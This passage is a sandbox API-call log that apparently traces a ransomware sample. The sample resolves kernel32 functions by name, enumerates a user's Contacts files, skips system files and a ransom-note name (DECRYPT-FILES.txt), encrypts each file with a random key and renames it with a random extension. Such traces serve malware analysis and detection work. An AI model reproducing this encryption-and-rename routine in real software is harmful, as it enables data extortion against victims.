[0082.714] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.715] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.715] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.715] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.715] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.715] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.715] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.715] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.715] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.715] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.715] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.715] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.715] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.715] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.715] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.715] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.715] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.715] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.716] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.716] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 60 [0082.716] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.n98cSFW") returned 68 [0082.716] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.n98cSFW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.n98csfw"), dwFlags=0x0) returned 1 [0082.716] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.716] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.717] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.717] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0082.717] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="DECRYPT-FILES.txt") returned -1 [0082.717] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="autorun.inf") returned -1 [0082.717] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="boot.ini") returned -1 [0082.717] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="desktop.ini") returned -1 [0082.717] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="ntuser.dat") returned -1 [0082.717] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="iconcache.db") returned -1 [0082.717] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="bootsect.bak") returned -1 [0082.717] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="ntuser.dat.log") returned -1 [0082.717] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="thumbs.db") returned -1 [0082.717] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="Bootfont.bin") returned -1 [0082.717] lstrlenW (lpString="asdlfk poopvy.contact") returned 21 [0082.717] lstrcmpiW (lpString1="contact", lpString2="lnk") returned -1 [0082.717] lstrcmpiW (lpString1="contact", lpString2="exe") returned -1 [0082.717] lstrcmpiW (lpString1="contact", lpString2="sys") returned -1 [0082.717] lstrcmpiW (lpString1="contact", lpString2="dll") returned -1 [0082.717] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0082.717] lstrlenW (lpString="asdlfk poopvy.contact") returned 21 [0082.717] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0082.717] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="asdlfk poopvy.contact" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" [0082.718] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.718] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=1171) returned 1 [0082.718] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.718] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.719] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.719] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.719] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.719] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.720] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.720] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.720] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.720] CloseHandle (hObject=0x43c) returned 1 [0082.720] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.720] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.721] CloseHandle (hObject=0x0) returned 0 [0082.721] CloseHandle (hObject=0x438) returned 1 [0082.721] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.722] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.722] GetTickCount () returned 0x114d26c [0082.722] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.722] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.722] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.722] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.723] lstrlenA (lpString="kernel32.dll") returned 12 [0082.723] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.723] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.723] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.723] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.723] lstrlenA (lpString="ADDATOMA") returned 8 [0082.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.723] lstrlenA (lpString="ADDATOMW") returned 8 [0082.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.723] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.723] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.723] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.723] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.723] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.723] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.723] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.724] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.724] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.724] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.724] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.724] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.724] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.724] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.724] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.724] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.724] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.724] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.724] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.724] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.724] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.724] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.724] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.724] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.724] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.725] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.725] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.725] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.725] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.725] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.725] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.725] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.725] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.725] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.725] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.725] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.725] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.725] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.725] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.725] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.725] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.725] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.726] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.726] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.726] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.726] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.726] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.726] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.726] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.726] lstrlenA (lpString="BEEP") returned 4 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.726] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.726] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.726] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.726] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.726] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.726] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.726] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.726] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.726] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.726] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.726] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.727] lstrlenA (lpString="CANCELIO") returned 8 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.727] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.727] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.727] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.727] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") 